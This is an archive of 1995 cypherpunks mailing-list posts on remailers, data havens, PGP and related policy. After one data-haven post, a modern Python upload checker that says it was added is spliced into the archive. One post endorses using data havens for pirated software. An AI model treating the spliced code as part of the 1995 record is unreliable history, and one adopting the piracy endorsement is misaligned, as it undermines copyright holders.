From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Sat, 14 Jan 95 16:28:35 PST
To: Raph Levien <raph@netcom.com>
Subject: Re: Draft of editorial to SF Chronicle
In-Reply-To: <199501140623.WAA14448@netcom4.netcom.com>
Message-ID: <Pine.3.89.9501141838.A25621-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain


editorial.rad.nice
even I'm still here..to show it works.
censored.org registration is finally in. Thankx <frissell@panix.com>
I can even use Lance's remailer correctly now.
and so I dont waste "bandwidth" this is end of screen. rad.editorial!

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren Fleckenstein <73211.3713@compuserve.com>
Date: Sat, 14 Jan 95 15:46:40 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: voice pgp
Message-ID: <950114234444_73211.3713_DHI35-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


I've heard mention that Phil Zimmermann was going to demonstrate Voice
PGP at the January Cypherpunks meeting at Cygnus. Can anyone mail me a
note about this? Has the meeting already taken place? How well did the
demo perform?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsled@free.org (Josh Michael Sled)
Date: Sat, 14 Jan 95 15:18:38 PST
To: cypherpunks@toad.com
Subject: Slogan/procmail help
Message-ID: <199501142337.XAA08521@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Speaking of testing stuff....  

After my last question about C'punks slogans, I've messed up some
stuff and  haven't storage of the list since, therefore I don't have
any of the replies.  If anyone would like to compile a list of what's
been said (if anything) and  mail to to me (to jsled@ctp.org), I'd be
eternally grateful.

Also, if anyone is fluent in procmail (I think there are a couple of
you  floating around), please mail me at jsled@ctp.org...

Thanks a bunch, sorry for the annoyance.

Joshua M. Sled <jsled@ctp.org/jsled@free.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLxfoaaTT29daLBKRAQGXlQP/dYc4aPR7rNApmqG78jIDhYZJh6bqMg4i
AXVAAZ5IzLP4Z/qch7zkiTM05DjbmXOzkcVBmhlGlO+H2VfNug569A/jEKFnDrDs
wg0Rv5mPWLo74zUECHxp7faviAVmOxt7Bx3JzQCmHZXBekq+owUetEraq9hKzCzr
qQR+KUq3X+k=
=4gq8
-----END PGP SIGNATURE-----

---
  KWQ/2 1.2g NR  "MTV get off the air!" - DKs
                                                                                                       




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Sat, 14 Jan 95 20:45:53 PST
To: cypherpunks@toad.com
Subject: Another problem w/Data Havens...
Message-ID: <9501150445.AA13977@toad.com>
MIME-Version: 1.0
Content-Type: text



I can see a potential problem with Data Havens (as they've been discussed
here) that may very well inspire the wrath of the authorities more than
nuclear secrets or dirty pictures of J.Edgar Hoover...

How does one keep a site from becoming a remote pirated-software exchange
site? (Esp. since after that MIT case laws may be changed...) It seems that
such a service could become a magnet for the "elite warez" crowd... and even
if the operator isn't jailed it could lead to a shutdown of the service.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsled@free.org (Josh Michael Sled)
Date: Sat, 14 Jan 95 16:26:24 PST
To: cypherpunks@toad.com
Subject: Re: C`punks slogan? - Pri
Message-ID: <199501150045.AAA09400@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

lmccarth@thor.cs.umass.ed wrote:

 > Lest we suffer a recurrence of the C'punks Logo thread, which generated a
 > whole raft of list traffic which would have been better kept private, please
 > reply directly to Joshua and not to the whole list. [He seems to imply that
 > he wants private replies ("testing procmail") anyway, but I want to encourage 
 > this practice explicitly.]


Thanks...  actually, that's exactly what I wanted, but forgot to put
it in...  and my last post about "Slogan help": disregard that
entirely... it's not  needed (either part).  But so far I've only gotten
one reply about the slogan  thing, so please give me help on that one,
folks...

Josh Sled <jsled@ctp.org/jsled@free.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLxf3kKTT29daLBKRAQGEWgQAhrKR/r/+mqXO63RN86c7hq3bsmid2KLU
ct2zJAebaZBzVvltrF3WsBYoWmCSo1tWrYFjv3QsU1gnRJRyxSGVtzzkfOSq7b51
UlGRzUb+6AXvviWmqdBwHGWbT4M6/mxxH8X8gC/eeFWyHMpgEcFzhV9tWUHCqkC/
GMDvXoaKPa0=
=i71M
-----END PGP SIGNATURE-----

---
  KWQ/2 1.2g NR  "MTV get off the air!" - DKs
                                                                 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 14 Jan 95 22:02:40 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501150554.AA29412@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 AM 1/14/95 -0600, Larry E wrote:
> ... Those who believe remailers are an evil will argue against any
>measure that will promote their presence (and I'm not suggesting
>you're in that group).  ...

True enough.

> ... Is encryption a step in the right direction, if an imperfect one?  If
>not I hope some other positive steps are proposed soon, else I fear
>remailers may face extinction.

The big problem I have with mandatory encryption for remailers is that it 
thwarts one of the two major purposes of remailers.  Basically I see 
remailers serving two goals:

        1)  Defeating traffic analysis of point-to-point communications.
            Mandating encryption for this is redundant--anyone who wanted this
            would be encrypting their mail to begin with.  Also, I don't
            believe this mode of operation generates many complaints.

        2)  Anonymous broadcast transmission.  This one can generate a lot of
            complaints, but it is also very important for things like *.recovery
            newsgroups.  Mandating encryption renders this mode useless.

There is a third use, which is anonymous point-to-point transmission.  While 
this is of some benefit for anonymous tip line, it makes things like 
mailbombs and hate mail very easy.
        

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 14 Jan 95 22:02:48 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501150554.AB29412@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:51 AM 1/14/95 -0700, Ben.Goren@asu.edu wrote:
> ... Dave certainly doesn't want to know what Alice is sending him, because he
>might have to answer to a Grand Jury if he did. ...
>
>Of course, any data haven worth paying for will offer lots of neat
>features, like PGP support, anonymous file drops, and all other sorts of
>goodies. But that does little good if Alice can trick Dave into selling
>child pornography. ...

At 11:45 PM 1/14/95, Robert Rothenberg wrote:
> ... How does one keep a site from becoming a remote pirated-software exchange
>site? (Esp. since after that MIT case laws may be changed...) It seems that
>such a service could become a magnet for the "elite warez" crowd... and even
>if the operator isn't jailed it could lead to a shutdown of the service.

The whole point of a "data haven" is that the site of operation is in a 
jurisdiction where these things are not legal problems.  If you operate a DH 
in a location where child pornography/copyright laws are vigorously 
enforced, I really doubt that encryption is going to make any difference.  
As Robert rightly points out, a DH probably will become a location of 
massive copyright violation, etc ad nauseam.

I've cc'ed Mike Godwin on this in the hope that he can shed some light on 
what the scienter requirements for something like this would be.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lce@wwa.com (Larry E)
Date: Sun, 15 Jan 95 01:09:10 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <9501150554.AA29412@eri.erinet.com>
Message-ID: <p$D6lG9s1mGL075yn@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9501150554.AA29412@eri.erinet.com>, 
   pstemari@erinet.com (Paul J. Ste. Marie) wrote:
> 
>         1)  Defeating traffic analysis of point-to-point communications.
>             Mandating encryption for this is redundant--anyone who wanted this
>             would be encrypting their mail to begin with.  Also, I don't
>             believe this mode of operation generates many complaints.

Agreed.

> 
>         2)  Anonymous broadcast transmission.  This one can generate a lot of
>             complaints, but it is also very important for things like *.recovery
>             newsgroups.  Mandating encryption renders this mode useless.
>                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Here, I don't understand your point.  If you mean an encrypted
message to a remailer cannot result in a plaintext usenet posting,
that of course is not true.  The remailers have PGP keys of their
own, just as any private user may.  In addition, some of the
remailers support direct usenet posting.  Thus, a message may be
encrypted to the remailer and posted as plaintext as the remailer
decrypts the message.


> There is a third use, which is anonymous point-to-point transmission.  While 
> this is of some benefit for anonymous tip line, it makes things like 
> mailbombs and hate mail very easy.
>         

Agreed.  At least some remailers accept requests from users that they
not receive anonymous mail.  The process of "kill-filing" outbound
anonymous mail targeted for specific locations could of course be
automated.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: j.hastings6@genie.geis.com
Date: Sun, 15 Jan 95 00:26:31 PST
To: cypherpunks@toad.com
Subject: L.A. area-Karl Hess Club
Message-ID: <199501150826.AA027478379@relay2.geis.com>
MIME-Version: 1.0
Content-Type: text/plain


The following was written by me, Kent Hastings:
Sorry, no PGP sig, I'm stranded in Chico,CA for a while...
     L O S   A N G E L E S   A R E A   M E E T I N G
"Extremism in the defense of liberty is no vice, and let me
remind you, moderation in the pursuit of justice is no virtue."
 - Aristotle, as used by Karl Hess for Barry Goldwater.
 
      ---   T h e   K a r l   H e s s   C l u b   ---
 
                    "GOODBYE, MURRAY!"
 
In the third meeting in the Post Election Series, we intended
to present an update on the Objectivists after our meetings
with the Republicans, the Libertarian Party, and Left Anarchists.
Unfortunately, the Ayn Rand Institute declined our invitation to address our
group on The Night Of January The 16th.
 
When readers of Liberty Magazine were asked to rate the
influence of various thinkers, at the top, with an equal
rating to Rand, was "Mr. Libertarian," Murray N. Rothbard, PhD.
 
Murray died last week, so we will instead have a special
Memorial tribute to his life and thought. He is best known
for his work in Austrian School economics and Libertarian
philosophy, and notorious for bashing Objectivists with
essays like "The Sociology of the Ayn Rand Cult." (Don't
worry, the abuse was mutual). His most recent libertarian
strategy was to make an alliance with the Old Right, a.k.a.
"Paleoconservatives." We hope you'll agree that this is
relevant in our Post Election environment.
 
Samuel Edward Konkin III (SEK3) knew Murray personally, and
credits him as a founder of the modern Libertarian movement
in written accounts in his magazine, New Libertarian. I assume
SEK3 will host tributes from others who also knew Murray.
 
Monday, January 16, 1995
Hasmik's Family Restaurant
Cheviot Hills neighborhood of Los Angeles
National Blvd (I think 9824 National)
 
Unfortunately, I can't attend this one because of the floods,
and I don't have the address handy, but it is the same time
and place as the last meeting.
 
Kent - j.hastings6@genie.geis.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sun, 15 Jan 95 12:46:09 PST
To: cypherpunks@toad.com
Subject: Re: voice pgp
In-Reply-To: <950114234444_73211.3713_DHI35-1@CompuServe.COM>
Message-ID: <199501151705.JAA00195@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Loren Fleckenstein <73211.3713@compuserve.com>


   I've heard mention that Phil Zimmermann was going to demonstrate Voice
   PGP at the January Cypherpunks meeting at Cygnus. 

1.  We've been meeting at SGI for several months now.

2.  Phil Z. was there; there was no demo.  Draw your own conclusions.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Sun, 15 Jan 95 12:46:32 PST
To: wcs@anchor.ho.att.com
Subject: Re: Data Haven problems
In-Reply-To: <9501090448.AA14477@anchor.ho.att.com>
Message-ID: <Pine.SV4.3.91.950115101641.725A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Some sites may only accept encrypted files, which reduces the spam 
> potential considerably, as well as reducing your exposure to the
> porn police, though it's difficult to do anything about files that are
> encrypted with a public key whose private key has been posted to the net,
> or fake crypto headers in an otherwise unencrypted file,

   This is interesting; during the last week or so that I've not been 
current with the list, I've started to implement a data-haven that takes 
information over sockets or MIME e-mail, and requires the use of PGP 
keypairs for the data.  I don't *WANT* to know what data they're 
transferring me.  If digicash would ever reply to one of my applications, 
I could sell it on a digicash/day basis.  Blah.  Neat idea, but the $ 
part is kinda limiting.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )
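The quoted concern about "fake crypto headers in an otherwise unencrypted file" can be checked structurally when an upload arrives. The following is an added example, not code from this thread or from any poster's data haven: it assumes OpenPGP packet framing as specified in RFC 4880 (which also covers the old-format headers PGP 2.x wrote), and `check_upload`, the helper names and the sample bytes are constructed for illustration.

```python
import base64
import binascii

PKESK, SYM_ENC, SEIPD = 1, 9, 18  # OpenPGP packet tags (RFC 4880)
BEGIN, END = "-----BEGIN PGP MESSAGE-----", "-----END PGP MESSAGE-----"


def crc24(data):
    """CRC-24 checksum used by OpenPGP ASCII armor."""
    crc = 0xB704CE
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= 0x1864CFB
    return crc & 0xFFFFFF


def armor(binary):
    """Armor bytes; used here only to build the constructed samples."""
    body = base64.b64encode(binary).decode()
    lines = [body[i:i + 64] for i in range(0, len(body), 64)]
    check = base64.b64encode(crc24(binary).to_bytes(3, "big")).decode()
    return "\n".join([BEGIN, "Version: 2.6", ""] + lines + ["=" + check, END, ""])


def dearmor(text):
    """Return the binary payload; raise ValueError if the armor is bogus."""
    lines = [ln.strip() for ln in text.splitlines()]
    try:
        start = lines.index(BEGIN)
        end = lines.index(END, start)
        blank = lines.index("", start, end)  # blank line ends the armor headers
    except ValueError:
        raise ValueError("no complete armor block")
    body = [ln for ln in lines[blank + 1:end] if ln]
    if not body or not body[-1].startswith("="):
        raise ValueError("missing armor checksum")
    try:
        data = base64.b64decode("".join(body[:-1]), validate=True)
        check = base64.b64decode(body[-1][1:], validate=True)
    except binascii.Error:
        raise ValueError("armor body is not base64")
    if int.from_bytes(check, "big") != crc24(data):
        raise ValueError("armor checksum mismatch")
    return data


def packet_tags(data):
    """Walk the packet headers and return the list of packet tags."""
    tags, pos = [], 0
    while pos < len(data):
        first = data[pos]
        if not first & 0x80:
            raise ValueError("not an OpenPGP packet header")
        pos += 1
        if first & 0x40:  # new-format header
            tag, octet = first & 0x3F, data[pos]
            if octet < 192:
                length, pos = octet, pos + 1
            elif octet < 224:
                length, pos = ((octet - 192) << 8) + data[pos + 1] + 192, pos + 2
            elif octet == 255:
                length, pos = int.from_bytes(data[pos + 1:pos + 5], "big"), pos + 5
            else:  # partial body length; simplification: packet runs to the end
                length = len(data) - pos
        else:  # old-format header, as written by PGP 2.x
            tag = (first >> 2) & 0x0F
            size = (1, 2, 4, 0)[first & 0x03]  # 0 means indeterminate length
            length = int.from_bytes(data[pos:pos + size], "big") if size else len(data) - pos
            pos += size
        if pos + length > len(data):
            raise ValueError("packet length runs past end of data")
        tags.append(tag)
        pos += length
    return tags


def check_upload(blob):
    """Return (accepted, reason) for an upload given as bytes."""
    try:
        if blob.lstrip().startswith(b"-----BEGIN PGP"):
            blob = dearmor(blob.decode("ascii"))
        tags = packet_tags(blob)
    except (ValueError, IndexError) as exc:
        return False, "rejected: %s" % exc
    keyed = 0
    while keyed < len(tags) and tags[keyed] == PKESK:
        keyed += 1
    if keyed == 0:
        return False, "rejected: no public-key encrypted session key"
    if tags[keyed:] not in ([SYM_ENC], [SEIPD]):
        return False, "rejected: session key not followed by one encrypted data packet"
    return True, "accepted"


def old_packet(tag, body):
    """Constructed old-format packet with a one-octet length (body < 256 bytes)."""
    return bytes([0x80 | (tag << 2), len(body)]) + body


# Constructed samples, not real PGP output.
ENCRYPTED = armor(old_packet(1, bytes(12)) + old_packet(9, bytes(range(32)))).encode()
FAKE_HEADER = (BEGIN + "\nVersion: 2.6\n\nThis file is ordinary readable text.\n"
               + END + "\n").encode()
ARMORED_PLAINTEXT = armor(old_packet(11, b"b\x00\x00\x00\x00\x00readable text")).encode()

if __name__ == "__main__":
    for name in ("ENCRYPTED", "FAKE_HEADER", "ARMORED_PLAINTEXT"):
        print(name, check_upload(globals()[name]))
```

A structural check like this cannot detect the other case raised in the quoted text, a file encrypted to a public key whose private key has been posted to the net.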




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Sun, 15 Jan 95 12:46:22 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Crypto functions
In-Reply-To: <9501102208.AA26444@snark.imsi.com>
Message-ID: <Pine.SV4.3.91.950115103408.725B-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> I wouldn't use BLOWFISH. 

   Why?

> MD4 is flawed -- and it's a hash function, not a crypto function (as is 
> MD5). 

   I'm curious - do you view one-way hash functions as nonessential for 
crypto?

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Sun, 15 Jan 95 12:45:33 PST
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Dangerous Web Site
In-Reply-To: <Pine.ULT.3.91.950113112935.6321A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SV4.3.91.950115110500.725C-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> They do credit checks of any person, SS# ID's, national database 
> searches, etc of any person or business (for a small fee).

   I actually found it at the "Internet Credit Bureau": 
http://www.satelnet.org/credit/ .. their e-mail address is icb@satelnet.org.

   It strikes me that their service makes it incredibly easy to breach 
the Fair Credit Reporting Act..

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 15 Jan 95 12:41:36 PST
To: lcottrell@popmail.ucsd.edu
Subject: Re: Scientology
Message-ID: <ab3f26ae01021004e8c7@[137.110.24.249]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

                                                         1/15/95 

TO:    THOMAS M. SMALL
       COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
       PUBLICATIONS, INC.

FROM:  Lance Cottrell
       Operator of remailer@nately and mixmaster@nately

In response to your email of January 3, 1995 requesting that I block anonymous posting to the Internet news groups alt.clearing.technology and alt.religion.scientology.

Although my remailers have always supported direct posting to news groups, this feature has never been advertised or supported. Since direct posting from my remailers is never used, I am willing to comply with your request. Posting to alt.clearing.technology and alt.religion.scientology has been blocked.

By this action I do not admit to any wrongdoing on my part, nor do I wish to imply any wrongdoing on the part of any users of my remailers. I am merely turning off a feature that I never intended to be used.

By design it is not possible to prevent users from using my remailers to send a message to another computer to be posted. I can not, and will not, block mail to other remailers or to mail-to-news gateways.

                                Yours,
                                        Lance M. Cottrell

CC: Cypherpunks@toad.com, remailer-operators@c2.org,
    alt.privacy.anon-server, alt.privacy,
    alt.religion.scientology, alt.clearing.technology

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxl9WlVkk3dax7hlAQH5lAP9HWND3nMsoz/Yn6fz36iqtDqI7s3cEllM
Gaajeq4qAR/t5a5CrEyOW1sYq+bxw5UZppREJC5uBbcp7ZP2k/7jprEcq9O7run3
ZX985aIY8f5kI6GmUemhmQcflgyNDoeDJMFhRBrvDQqCWueLKVUZLNXx9bsMCi94
EH/mStSfdJY=
=UgN1
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsled@free.org (Josh Michael Sled)
Date: Sun, 15 Jan 95 12:48:04 PST
To: cypherpunks@toad.com
Subject: Re: C`punks slogan? - Pri
Message-ID: <199501151237.MAA02068@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

lmccarth@thor.cs.umass.ed wrote:

 > Lest we suffer a recurrence of the C'punks Logo thread, which generated a
 > whole raft of list traffic which would have been better kept private, please
 > reply directly to Joshua and not to the whole list. [He seems to imply that
 > he wants private replies ("testing procmail") anyway, but I want to encourage 
 > this practice explicitly.]


Thanks...  actually, that's exactly what I wanted, but forgot to put
it in...  and my last post about "Slogan help": disregard that
entirely... it's not  needed (either part).  But so far I've only gotten
one reply about the slogan  thing, so please give me help on that one,
folks...

Josh Sled <jsled@ctp.org/jsled@free.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLxf3kKTT29daLBKRAQGEWgQAhrKR/r/+mqXO63RN86c7hq3bsmid2KLU
ct2zJAebaZBzVvltrF3WsBYoWmCSo1tWrYFjv3QsU1gnRJRyxSGVtzzkfOSq7b51
UlGRzUb+6AXvviWmqdBwHGWbT4M6/mxxH8X8gC/eeFWyHMpgEcFzhV9tWUHCqkC/
GMDvXoaKPa0=
=i71M
-----END PGP SIGNATURE-----

---
  KWQ/2 1.2g NR  "MTV get off the air!" - DKs
                                                                 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Sun, 15 Jan 95 14:01:27 PST
To: Robert Rothenberg <cypherpunks@toad.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <v02110101ab3f4b2da617@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:45 PM 1/14/95, Robert Rothenberg wrote:
>[. . .]
>How does one keep a site from becoming a remote pirated-software exchange
>site? [. . . .]

Simple. The file is deleted upon retrieval.

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sun, 15 Jan 95 12:47:17 PST
To: cypherpunks@toad.com
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <9501150445.AA13977@toad.com>
Message-ID: <Pine.HPP.3.91.950115145754.101B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Robert Rothenberg wrote:

> such a service could become a magnet for the "elite warez" crowd...


What's wrong with young, curious eLiTiStS running storing sites for
mutual benefits ('warez')? Some say copyright is dead. Others have
taken this to their hearts, especially for private use, and I don't
blame them. Copyrighted data on a server in a jurisdiction that
doesn't acknowledge the copyrights - a prime use for Data Havens
when they come of age.

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 15 Jan 95 12:42:01 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: 2 announcements of possible interest
Message-ID: <199501152041.PAA10484@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


2 announcements (one from PRIVACY, the other from Cyberia.)

second is NII Security Issues Forum to Hold 2 Meetings 01/27/95 NEW
 01/12/95


Date:    Fri, 13 Jan 95 11:25:27 EST
From:    denning@cs.cosc.georgetown.edu (Dorothy Denning)
Subject: INTERNATIONAL CRYPTOGRAPHY INSTITUTE 1995

             Call for Participation (Deadline: March 15, 1995)

       INTERNATIONAL CRYPTOGRAPHY INSTITUTE 1995: GLOBAL CHALLENGES

                          September 21-22, 1995
                              Washington, DC

	                       Presented by
	     The National Intellectual Property Law Institute 


The International Cryptography Institute will focus on the cryptography
challenges associated with meeting the information protection needs of
users and the law enforcement and national security needs of nations.
The Institute will address such topics as:

  - national encryption policies and regulations
  - meeting user needs for information security and data recovery 
  - meeting law enforcement and national security needs
  - national and global encryption markets and product availability
  - international approaches and standards
  - creating an international cryptography infrastructure
  - the use of encryption technologies in different countries
  - cryptography in the financial industry and other industries
  - legal and policy issues of digital signatures and digital cash
  - new developments in encryption policies and technologies

Persons interested in speaking at the conference are invited to submit
a proposal to the Institute Chair:
	
	      Prof. Dorothy E. Denning, Chair ICI '95
	      Georgetown University
	      Computer Science Department
	      225 Reiss Building
	      Washington DC 20057-0997
	      ph: 202-687-5703, fax: 202-687-6067
	      e-mail: denning@cs.georgetown.edu

Proposals must be received by MARCH 15, 1995, and should include the
following:

  - Name, title, organization, address, phone, fax, and e-mail address
  - Brief biography
  - Title of presentation
  - Abstract of presentation or paper
  - Amount of time requested for presentation and discussion

Notification of acceptance will be made by April 15, 1995.  Papers and
materials for the proceedings will be due on August 15, 1995.
   
Inquiries about registration or the proceedings should be addressed to:

              The National Intellectual Property Law Institute
              P.O. Box 27913, Washington, DC 20038-7913
              ph:  800-301-MIND or 202-962-9494
              fax: 800-304-MIND or 202-962-9495

------------------------------

From: Seth Greenstein <sethg@access.digex.net>

Subject: NII Security Issues Forum to Hold 2 Meetings 01/27/95 NEW 01/12/95

OFFICE OF MANAGEMENT AND BUDGET

NOTICE OF PUBLIC MEETING 

Agency:  Office of Management and Budget

Action:  National Information Infrastructure Security Issues
Forum:  Notice of Public Meetings and request for public comments

SUMMARY:  The National Information Infrastructure Security Issues
Forum will conduct two public meetings to continue a dialogue
between government and the private and public interest sectors on
issues related to the security of information on the National
Information Infrastructure (NII). Interested parties --
especially beneficiaries of Aid to Families with Dependent
Children and Food Stamps, and users of public information, and
participants in the sophisticated communications networks which
support the U.S. transportation and customs systems -- are
invited to submit a 1 - 2 page position statement and request to
testify.  

     The meetings are sponsored by the NII Security Issues Forum
of the Information Infrastructure Task Force and Mega-Project III
of the U.S. Advisory Council on the NII.  

DATES:  Both public meetings, "Security of the Electronic
Delivery of Government Information and Services" and "Security
for Intelligent Transportation Systems and Trade Information,"
will be held simultaneously on Friday, January 27, 1995, from
9:00 a.m. to 12:30 p.m. in Raleigh, North Carolina. 


     Those wishing to testify should submit a 1 - 2 page position
statement and request to participate by January 20, 1995. 
Individuals wishing to offer general comments or present
questions may request to do so during the meeting.  Written
comments may be submitted on paper or electronically, in ASCII
format, and will be accepted until February 10, 1995.  

ADDRESSES:  The public meeting, "Security of the Electronic
Delivery of Government Information and Services," will be held in
the Auditorium of the North Carolina Museum of History, 1 East
Edenton Street, Raleigh, North Carolina.  The public meeting,
"Security for Intelligent Transportation Systems and Trade
Information," will be held in the Auditorium of the Department of
Cultural Affairs, 109 East Jones Street, Raleigh, North Carolina. 
Both buildings are in close proximity to the North Carolina
Capitol Building. 

     Position statements and requests to appear for the meeting,
"Security of the Electronic Delivery of Government Information
and Services," should be sent to the Government Information Technology
Services Working Group, marked to the attention of Ms. April
Ramey, U.S. Department of the Treasury, 1425 New York Avenue,
Room 2150 N.W., Washington, D.C.  20220.  Position statements may
also be submitted via fax to (202) 622-1595 or through electronic
mail to april.ramey@treas.sprint.com.  Electronic mail should be
submitted as unencoded, unformatted, ASCII text.  

     Position statements and requests to appear for the meeting,
"Security for Intelligent Transportation Systems and Trade
Information," should be sent to the Volpe National Transportation
Systems Center of the Department of Transportation, marked to the
attention of Mr. Gary Ritter, DTS-21, at 55 Broadway, Cambridge,
MA, 02142.  Position statements may also be submitted via fax to
(617) 494-2370 or through electronic mail to
"Ritter@volpe1.dot.gov".  Electronic mail should be submitted as
unencoded, unformatted, ASCII text.  

     Parties offering testimony are asked to provide them on
paper, and where possible, in machine-readable format.
Machine-readable submissions may be provided through electronic mail
messages sent over the Internet, or on a 3.5" floppy disk
formatted for use in an MS-DOS based computer.  Machine-readable
submissions should be provided as unencoded, unformatted ASCII
text.      

     Written comments should include the following information:  
*    Name and organizational affiliation, if any, of the
     individual responding;
*    An indication of whether comments offered represent views of
     the respondent's organization or are the respondent's
     personal views; and
*    If applicable, information on the respondent's organization,
     including the type of organization (e.g., trade association,
     private corporation, non-profit organization) and general
     areas of interest.

FOR FURTHER INFORMATION CONTACT:   For further information
relating to electronic delivery of information and services,
contact Ms. April Ramey of the Treasury Department at
(202) 622-1278.

     For further information relating to transportation and trade
issues, contact Mr. Gary Ritter at the Volpe National
Transportation Systems Center by telephone at (617) 494-2716.

SUPPLEMENTARY INFORMATION:  

I.  Issues for Public Comment

A.   Background 

     The public meetings are part of an ongoing dialogue with the
Administration to assess the security needs and concerns of users
of the National Information Infrastructure (NII).  The NII is a
system of high-speed telecommunications networks, databases, and
advanced computer systems that will make electronic information
more widely available and accessible than ever before.  For
example, citizens may be able to learn about federal benefits
programs through public kiosks, or may receive their social
security payments through direct deposit to their bank accounts. 
As the U.S. transportation infrastructure becomes more complex,
Americans will benefit from the application of information
technologies to such operations as toll collection, motor vehicle
registration, and traffic routing.  This increased availability
and accessibility of services and products provided through
information technology will dramatically affect the way in which
individuals conduct their everyday affairs. 

     Consequently, broad public and commercial use of the NII
hinges upon implementing technologies, policies, and practices
that not only ensure that users of information systems have
access to information when and where they need it, but that
subjects of information records are able to protect themselves
from unauthorized or inappropriate use of information.    

     "Americans will not use the NII to its full potential unless
